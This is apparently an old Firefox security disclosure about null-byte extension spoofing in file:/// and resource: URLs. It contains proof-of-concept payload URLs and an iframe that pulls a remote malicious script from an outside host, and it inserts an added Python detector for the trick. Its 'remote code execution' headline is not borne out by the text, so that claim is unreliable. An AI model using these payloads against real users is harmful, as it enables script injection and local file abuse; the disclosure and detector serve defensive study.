Firefox Remote & Local Code Execution 0day.

Published on: 1181099140
I found this vulnerability in Firefox moments ago while I was playing with the urlbar.
It seems Firefox is vulnerable to null-byte file type corruption. It is possible to execute a file as a different filetype and trick Firefox into executing it. Is this dangerous? Yeah, it's pretty bad.

URI schemes that are vulnerable:

file:///
resource:
Syntax:
[uri]/[filelocation]/[file][.ext]%00[.ext]
Example:
file:///C:/Program%20Files/Mozilla%20Firefox/firefox.exe%00.html

or:

resource:///README.txt%00.html
More filetypes:

file:///C:/Program%20Files/Mozilla%20Firefox/firefox.exe%00.html
file:///C:/Program%20Files/Mozilla%20Firefox/firefox.exe%00.js
file:///C:/Program%20Files/Mozilla%20Firefox/firefox.exe%00.pdf
file:///C:/Program%20Files/Mozilla%20Firefox/firefox.exe%00.doc
file:///C:/Program%20Files/Mozilla%20Firefox/firefox.exe%00.xls
probably every filetype.

Oh and: file:///C:/Program%20Files/Mozilla%20Firefox/firefox.exe%00.xpi :)
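To show what goes wrong in the URLs above, here is an added example (not part of the original advisory) that decodes a URL path, splits it at the first NUL and compares the extension a naive type sniffer sees with the extension of the file that is actually opened, which is the check a URL handler or content filter would want. It also decodes repeatedly so a double-encoded NUL (%2500) is treated the same way; that is a conservative choice of this example, not something the advisory describes.

```python
"""Detect null-byte extension spoofing in file:/resource: URLs (added example)."""
from urllib.parse import urlsplit, unquote
import posixpath


def decode_fully(s: str, max_rounds: int = 3) -> str:
    """Percent-decode repeatedly until stable, so "%2500" ends up as a NUL too.
    Treating double-encoding as suspicious is a defensive assumption of this example."""
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def analyze_url(url: str) -> dict:
    """Split the decoded path at the first NUL and report the extension a naive
    sniffer sees ("claimed") versus the extension of the file really opened ("real")."""
    parts = urlsplit(url)
    decoded = decode_fully(parts.path)          # "%20" -> " ", "%00" -> "\x00"
    real_path, nul, _ = decoded.partition("\x00")  # a C string stops at the NUL
    real_ext = posixpath.splitext(real_path)[1].lower()
    claimed_ext = posixpath.splitext(decoded)[1].lower()
    return {
        "scheme": parts.scheme,
        "has_nul": bool(nul),
        "real_path": real_path,
        "real_ext": real_ext,
        "claimed_ext": claimed_ext,
        "spoofed": bool(nul) and claimed_ext != real_ext,
    }


def is_allowed(url: str) -> bool:
    """Policy a URL handler or filter can apply: refuse any URL whose decoded
    path carries a NUL at all, whatever follows it."""
    return "\x00" not in decode_fully(urlsplit(url).path)


# Constructed sample: the URL shapes quoted in the advisory plus benign and
# double-encoded controls (paths are placeholders, not real files).
SAMPLE_URLS = [
    "file:///C:/Program%20Files/Mozilla%20Firefox/firefox.exe%00.html",
    "resource:///README.txt%00.html",
    "file:///C:/Users/alice/notes.txt",
    "file:///C:/tmp/a.exe%2500.html",
]

if __name__ == "__main__":
    for u in SAMPLE_URLS:
        r = analyze_url(u)
        verdict = "allow" if is_allowed(u) else "BLOCK"
        print(f"{verdict:5} real={r['real_ext'] or '-':5} claimed={r['claimed_ext']:5} {u}")
```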

This could lead to various exploits, to name a few:

- DoSing a user (the above example almost does it)
- Code execution
- File access
- Trojan activation
- Virus activation
- Reflective Cross Site Scripting (RXSS)
- Cross Site Request Forgeries (CSRF)

Another example:
It is possible to turn regular stored .txt files into full JavaScript HTML zombies:
file:///[filelocation]/troy.txt%00.html
troy.txt could contain:

Bunch of malicious Javascript

Or:

<html>
<iframe name="bla" src="http://www.0x000000.com/hacks/?troy.js" width="100%" height="900"></iframe>
</html>


Well, I guess you get the point: nasty.